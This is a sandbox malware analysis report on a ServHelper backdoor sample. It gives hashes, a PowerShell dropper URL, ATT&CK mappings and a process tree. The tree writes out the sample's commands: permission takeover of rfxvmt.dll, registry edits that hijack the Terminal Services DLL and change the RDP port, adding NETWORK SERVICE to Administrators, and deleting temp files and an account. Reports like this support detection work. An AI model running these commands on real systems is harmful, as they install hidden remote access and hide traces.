servhelper | be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 00:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
Size

5.9MB
MD5

bfe0ac25eeeb759f7c8e06229c7313a2
SHA1

199c1fbd29f9ec98b83464763dac63ef80998bb3
SHA256

be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
SHA512

a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
SSDEEP

49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Servhelper family
servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4460	cmd.exe
1712	net.exe
5108	net1.exe
2404	cmd.exe
1612	net.exe
2176	net1.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
21	3460	powershell.exe
23	3460	powershell.exe
27	3460	powershell.exe
29	3460	powershell.exe
31	3460	powershell.exe
33	3460	powershell.exe
35	3460	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
3164	net.exe
3732	net1.exe
3064	cmd.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
4912	icacls.exe
868	icacls.exe
3912	takeown.exe
4100	icacls.exe
1860	icacls.exe
1728	icacls.exe
3724	icacls.exe
2700	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
4144	Process not Found
4144	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2700	icacls.exe
4912	icacls.exe
868	icacls.exe
3912	takeown.exe
4100	icacls.exe
1860	icacls.exe
1728	icacls.exe
3724	icacls.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	raw.githubusercontent.com
21	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023caa-84.dat	upx
behavioral2/files/0x0008000000023cab-85.dat	upx

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF8F7.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF909.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zfuyqj44.qde.psm1	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF919.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF908.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_p0e0vqni.cvx.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIF8D7.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3224	powershell.exe
3460	powershell.exe
4048	powershell.exe
2460	powershell.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
456	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4940	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1020	powershell.exe
1020	powershell.exe
4048	powershell.exe
4048	powershell.exe
2460	powershell.exe
2460	powershell.exe
3224	powershell.exe
3224	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
3460	powershell.exe
3460	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeRestorePrivilege	1860	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	456	WMIC.exe
Token: SeAuditPrivilege	456	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	456	WMIC.exe
Token: SeAuditPrivilege	456	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4220	WMIC.exe
Token: SeAuditPrivilege	4220	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4220	WMIC.exe
Token: SeAuditPrivilege	4220	WMIC.exe
Token: SeDebugPrivilege	3460	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 1020	2024	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe	84
PID 2024 wrote to memory of 1020	2024	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe	84
PID 1020 wrote to memory of 220	1020	powershell.exe	86
PID 1020 wrote to memory of 220	1020	powershell.exe	86
PID 220 wrote to memory of 772	220	csc.exe	87
PID 220 wrote to memory of 772	220	csc.exe	87
PID 1020 wrote to memory of 4048	1020	powershell.exe	89
PID 1020 wrote to memory of 4048	1020	powershell.exe	89
PID 1020 wrote to memory of 2460	1020	powershell.exe	96
PID 1020 wrote to memory of 2460	1020	powershell.exe	96
PID 1020 wrote to memory of 3224	1020	powershell.exe	98
PID 1020 wrote to memory of 3224	1020	powershell.exe	98
PID 1020 wrote to memory of 3912	1020	powershell.exe	103
PID 1020 wrote to memory of 3912	1020	powershell.exe	103
PID 1020 wrote to memory of 4100	1020	powershell.exe	104
PID 1020 wrote to memory of 4100	1020	powershell.exe	104
PID 1020 wrote to memory of 1860	1020	powershell.exe	105
PID 1020 wrote to memory of 1860	1020	powershell.exe	105
PID 1020 wrote to memory of 1728	1020	powershell.exe	106
PID 1020 wrote to memory of 1728	1020	powershell.exe	106
PID 1020 wrote to memory of 3724	1020	powershell.exe	107
PID 1020 wrote to memory of 3724	1020	powershell.exe	107
PID 1020 wrote to memory of 2700	1020	powershell.exe	108
PID 1020 wrote to memory of 2700	1020	powershell.exe	108
PID 1020 wrote to memory of 4912	1020	powershell.exe	109
PID 1020 wrote to memory of 4912	1020	powershell.exe	109
PID 1020 wrote to memory of 868	1020	powershell.exe	110
PID 1020 wrote to memory of 868	1020	powershell.exe	110
PID 1020 wrote to memory of 4052	1020	powershell.exe	111
PID 1020 wrote to memory of 4052	1020	powershell.exe	111
PID 1020 wrote to memory of 4940	1020	powershell.exe	112
PID 1020 wrote to memory of 4940	1020	powershell.exe	112
PID 1020 wrote to memory of 1932	1020	powershell.exe	113
PID 1020 wrote to memory of 1932	1020	powershell.exe	113
PID 1020 wrote to memory of 3872	1020	powershell.exe	114
PID 1020 wrote to memory of 3872	1020	powershell.exe	114
PID 3872 wrote to memory of 2912	3872	net.exe	115
PID 3872 wrote to memory of 2912	3872	net.exe	115
PID 1020 wrote to memory of 4752	1020	powershell.exe	116
PID 1020 wrote to memory of 4752	1020	powershell.exe	116
PID 4752 wrote to memory of 1524	4752	cmd.exe	117
PID 4752 wrote to memory of 1524	4752	cmd.exe	117
PID 1524 wrote to memory of 3360	1524	cmd.exe	118
PID 1524 wrote to memory of 3360	1524	cmd.exe	118
PID 3360 wrote to memory of 2188	3360	net.exe	119
PID 3360 wrote to memory of 2188	3360	net.exe	119
PID 1020 wrote to memory of 1792	1020	powershell.exe	120
PID 1020 wrote to memory of 1792	1020	powershell.exe	120
PID 1792 wrote to memory of 4408	1792	cmd.exe	121
PID 1792 wrote to memory of 4408	1792	cmd.exe	121
PID 4408 wrote to memory of 4500	4408	cmd.exe	122
PID 4408 wrote to memory of 4500	4408	cmd.exe	122
PID 4500 wrote to memory of 3996	4500	net.exe	123
PID 4500 wrote to memory of 3996	4500	net.exe	123
PID 3064 wrote to memory of 3164	3064	cmd.exe	128
PID 3064 wrote to memory of 3164	3064	cmd.exe	128
PID 3164 wrote to memory of 3732	3164	net.exe	129
PID 3164 wrote to memory of 3732	3164	net.exe	129
PID 5068 wrote to memory of 2956	5068	cmd.exe	132
PID 5068 wrote to memory of 2956	5068	cmd.exe	132
PID 2956 wrote to memory of 4880	2956	net.exe	133
PID 2956 wrote to memory of 4880	2956	net.exe	133
PID 4460 wrote to memory of 1712	4460	cmd.exe	136
PID 4460 wrote to memory of 1712	4460	cmd.exe	136

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kfo5agx2\kfo5agx2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:220
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE8B.tmp" "c:\Users\Admin\AppData\Local\Temp\kfo5agx2\CSCF7B62A6194F54BA48E4DC850AF71813F.TMP"
      4⤵
      PID:772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3912
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4100
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1728
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3724
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2700
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4912
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:868
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4052
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:4940
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1932
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2912
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3360
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4408
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4500
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1552

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
